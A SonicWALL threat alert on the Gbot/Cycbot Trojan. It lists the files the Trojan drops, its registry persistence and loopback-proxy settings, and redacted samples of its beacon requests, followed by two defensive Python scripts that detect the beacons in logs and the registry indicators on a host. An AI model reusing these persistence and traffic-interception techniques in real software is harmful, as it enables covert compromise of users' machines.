SonicWALL Security Center


Gbot Trojan (Dec 09, 2010)



Description


SonicWALL UTM Research team received reports of a new Trojan that relays sensitive information to remote hosts and accepts remote commands from an attacker. The Trojan makes periodic GET and POST requests to remote servers for pages and files that do not exist; parts of these requests carry system information (the POST parameters) or encrypted data (the tq= parameter).

The Trojan performs the following activities upon execution:

  • Drops the following three files on the compromised machine:
    • C:\Documents and Settings\User\Application Data\dwm.exe [ Detected as GAV: Cycbot.AA_6 (Trojan) ]
    • C:\Documents and Settings\User\Application Data\Microsoft\conhost.exe [ Detected as GAV: Cycbot.AA_6 (Trojan) ]
    • C:\Documents and Settings\User\Application Data\E6AE.A4A

  • Creates the following registry entries to ensure it is started at every logon. The Winlogon Shell value is normally just "explorer.exe"; the appended path launches the dropped dwm.exe alongside the shell. The Run value is named "svchost" and launches the dropped conhost.exe, both names borrowed from legitimate Windows binaries:

    • HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon Shell "explorer.exe,C:\Documents and Settings\User\Application Data\dwm.exe"
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost "C:\Documents and Settings\User\Application Data\Microsoft\conhost.exe"

  • Additional registry value created, which routes Internet Explorer's HTTP traffic through a proxy on the local machine (port 61333), so browser traffic can be intercepted by a listener on the compromised host:

    • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings ProxyServer "http=127.0.0.1:61333"

  • Samples of periodic web requests made by the Trojan:

    GET request to: freeonline{removed}.net
    /images/dating1.jpg?tq=gP4aKydUJoD%2BbLSpPM48HXAm%2BIp7RbMA%2Fj%2FBt%2F4rtL2W%2FTcjYNfHjHjmGehkmxM4tV0CLKqe6ul5HxkjOJVmFn2W7p6qiRuKM2cpy5wV67ZN5NyS3oiAzfBfnR82Oj6fiu%2Fhq0R50Za6gQOYeTN%2F3XLpS%2FuvwQ3f6llQ8jWyxwwpBg%2FcIwgI

    GET request to: 136{removed}.com
    /LB5000/CGI-BIN/s.cgi?tq=gHZutDyMv5rJej%2Fia9nrmsl6giWz%2BJZbVyA%3D

    GET request to: zon{removed}.com
    /images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvAp1ujbwvgS917W65rJqlLfgPiWW1cg

    GET request to: pcdoc{removed}.com
    /images/logo-1.jpg?tq=gP4aKydMI5oGWaj6So61fGRfYz7KV8jMqwqKxVRWKZa7fLqVtLymA%2FOn9Itcm1zra2bubThHUef0bm2jztvHVcirw2XGuLsR5u3V%2BorIwuAZQROKs16%2BmEVT3jBx0lWjP%2FEmg95AmzFTI18yhLbz8fvGc5zFAt5MlTLKL4RY8T1KL7GEaXaQeV4tnf0paKcyB

    POST request to: xibu{removed}.cn
    /pics/23.jpg?type=g_v53&system={IE Browser Ver}|{OS Ver}|{Language}&id=B0CA268F7F02CA4AE6AE&status=err088_2_0&n=0&extra=0
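
The request samples above share a shape that is easy to hunt for in proxy or web logs: GET requests for what look like static images or a CGI script that carry a single opaque tq= parameter, and a POST to an image path whose query string spells out browser version, OS version, language and a bot id. The following is an added example, not SonicWALL's code or a GAV signature; it runs over a few constructed log lines (placeholder hostnames, since the page redacts the real ones, and invented values in place of the page's {IE Browser Ver}|{OS Ver}|{Language} fields) and reports which lines match either beacon pattern.

```python
"""Classify proxy-log lines against the Cycbot/Gbot beacon shapes in the alert.

Added example (not SonicWALL's code). Log lines are assumed to be
"METHOD absolute-url"; the hostnames and the system/id values in SAMPLE_LOG
are constructed for the demonstration.
"""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote, urlsplit

# Constructed sample: three beacons modelled on the alert plus two benign lines.
SAMPLE_LOG = """\
GET http://freeonline.example.net/images/dating1.jpg?tq=gP4aKydUJoD%2BbLSpPM48HXAm%2BIp7RbMA%2Fj%2FBt%2F4rtL2W
GET http://136.example.com/LB5000/CGI-BIN/s.cgi?tq=gHZutDyMv5rJej%2Fia9nrmsl6giWz%2BJZbVyA%3D
POST http://xibu.example.cn/pics/23.jpg?type=g_v53&system=7.0|5.1|en-us&id=B0CA268F7F02CA4AE6AE&status=err088_2_0&n=0&extra=0
GET http://www.example.org/images/logo.jpg
GET http://www.example.org/search?q=cats
"""

# Opaque base64-style blob carried in the lone 'tq' parameter of the GET beacons
OPAQUE_RE = re.compile(r"^[A-Za-z0-9+/]{20,}={0,2}$")
# The beacons hide behind paths that look like static images or a CGI script
STATIC_RE = re.compile(r"\.(jpe?g|gif|png|cgi)$", re.IGNORECASE)


def query_params(query: str) -> Dict[str, str]:
    """Split a query string with plain unquote(): parse_qs would turn '+' into
    a space and corrupt the base64-style payload in 'tq'."""
    params = {}
    for pair in filter(None, query.split("&")):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def classify(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (host, kind, detail) for a beacon-like request, else None."""
    method, _, url = line.strip().partition(" ")
    parts = urlsplit(url)
    if not STATIC_RE.search(parts.path):
        return None
    params = query_params(parts.query)
    # GET beacon: a static-looking path whose only parameter is an opaque blob
    if method == "GET" and set(params) == {"tq"} and OPAQUE_RE.match(params["tq"]):
        return (parts.hostname, "tq-beacon",
                f"{len(params['tq'])}-char opaque blob on {parts.path}")
    # POST beacon: status report with type/system/id; system is browser|os|lang
    if method == "POST" and {"type", "system", "id"} <= set(params):
        browser, _, rest = params["system"].partition("|")
        os_ver, _, lang = rest.partition("|")
        return (parts.hostname, "status-post",
                f"id={params['id']} type={params['type']} "
                f"status={params.get('status', '')} browser={browser} "
                f"os={os_ver} lang={lang}")
    return None


def scan(log_text: str) -> List[Tuple[str, str, str]]:
    """Run classify() over every line and keep the hits."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for host, kind, detail in scan(SAMPLE_LOG):
        print(f"{kind:12} {host:26} {detail}")
```

The tq-beacon rule deliberately keys on structure (image or CGI path, exactly one parameter, long base64 alphabet value) rather than on hostnames, since the page shows the Trojan rotating across several unrelated domains; pivoting on the id= value from a status-post then ties all of a host's beacons together.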


SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

GAV: Cycbot.AA_6 (Trojan)
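
Beyond the gateway signature, the registry indicators listed above (an extra entry appended to the Winlogon Shell value, a Run value named after a system binary that points into Application Data, and a ProxyServer value aimed at 127.0.0.1) can be checked on a suspect host. The following is an added example, not SonicWALL's code: the analysis functions take registry values as plain strings so they run anywhere against a constructed sample built from the alert's entries, and collect_live_values() reads the real keys only on Windows through the standard winreg module. The list of impersonated binary names and the Application Data path markers are this example's own assumptions.

```python
"""Host-side triage of the persistence and proxy indicators in the alert.

Added example, not SonicWALL's code. SAMPLE_VALUES is constructed from the
alert's registry entries; the profile path on a real host will differ.
"""
import sys
from typing import Dict, List, Optional

SAMPLE_VALUES = {
    "winlogon_shell": "explorer.exe,C:\\Documents and Settings\\User\\Application Data\\dwm.exe",
    "run": {"svchost": "C:\\Documents and Settings\\User\\Application Data\\Microsoft\\conhost.exe"},
    "proxy_server": "http=127.0.0.1:61333",
}

APPDATA_MARKERS = ("\\application data\\", "\\appdata\\")
# Run value names that borrow legitimate Windows binary names (assumed list)
IMPERSONATED = {"svchost", "conhost", "dwm", "csrss", "lsass", "explorer", "winlogon"}


def extra_shell_entries(shell_value: str) -> List[str]:
    """Winlogon\\Shell is normally exactly 'explorer.exe'; every additional
    comma-separated entry is started alongside the shell at logon."""
    entries = [e.strip() for e in shell_value.split(",") if e.strip()]
    return [e for e in entries if e.lower() != "explorer.exe"]


def suspicious_run_entries(run_values: Dict[str, str]) -> List[str]:
    """Flag Run values launched from a user's Application Data directory or
    named after a system binary."""
    hits = []
    for name, command in run_values.items():
        lowered = command.lower()
        if any(m in lowered for m in APPDATA_MARKERS) or name.lower() in IMPERSONATED:
            hits.append(f"{name} -> {command}")
    return hits


def loopback_proxy(proxy_server: str) -> Optional[str]:
    """Return the endpoint if Internet Settings\\ProxyServer sends traffic to
    the local machine, e.g. 'http=127.0.0.1:61333' or '127.0.0.1:61333'."""
    for part in proxy_server.split(";"):
        _, _, endpoint = part.strip().rpartition("=")
        if endpoint.startswith(("127.", "localhost")):
            return endpoint
    return None


def triage(values: Dict) -> List[str]:
    """Combine the three checks into a list of human-readable findings."""
    findings = [f"Winlogon Shell extra entry: {e}"
                for e in extra_shell_entries(values["winlogon_shell"])]
    findings += [f"Run value: {h}" for h in suspicious_run_entries(values["run"])]
    endpoint = loopback_proxy(values["proxy_server"])
    if endpoint:
        findings.append(f"Browser proxy points at local listener: {endpoint}")
    return findings


def collect_live_values() -> Dict:
    """Read the same three locations from the live registry (Windows only)."""
    import winreg  # imported here so the module still loads on other platforms

    def read_value(hive, path, name, default=""):
        try:
            with winreg.OpenKey(hive, path) as key:
                return str(winreg.QueryValueEx(key, name)[0])
        except OSError:
            return default

    def read_all(hive, path):
        out, index = {}, 0
        try:
            with winreg.OpenKey(hive, path) as key:
                while True:
                    try:
                        name, data, _ = winreg.EnumValue(key, index)
                    except OSError:  # raised when no more values remain
                        return out
                    out[name] = str(data)
                    index += 1
        except OSError:
            return out

    return {
        "winlogon_shell": read_value(winreg.HKEY_CURRENT_USER,
                                     r"Software\Microsoft\Windows NT\CurrentVersion\Winlogon",
                                     "Shell", "explorer.exe"),
        "run": read_all(winreg.HKEY_LOCAL_MACHINE,
                        r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"),
        "proxy_server": read_value(winreg.HKEY_CURRENT_USER,
                                   r"Software\Microsoft\Windows\CurrentVersion\Internet Settings",
                                   "ProxyServer"),
    }


if __name__ == "__main__":
    values = collect_live_values() if sys.platform == "win32" else SAMPLE_VALUES
    for finding in triage(values) or ["no indicators found"]:
        print(finding)
```

Run it on the suspect machine as the affected user, since the Winlogon Shell override and the proxy setting live under HKEY_CURRENT_USER and are only visible in that user's hive.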



© 2014 Dell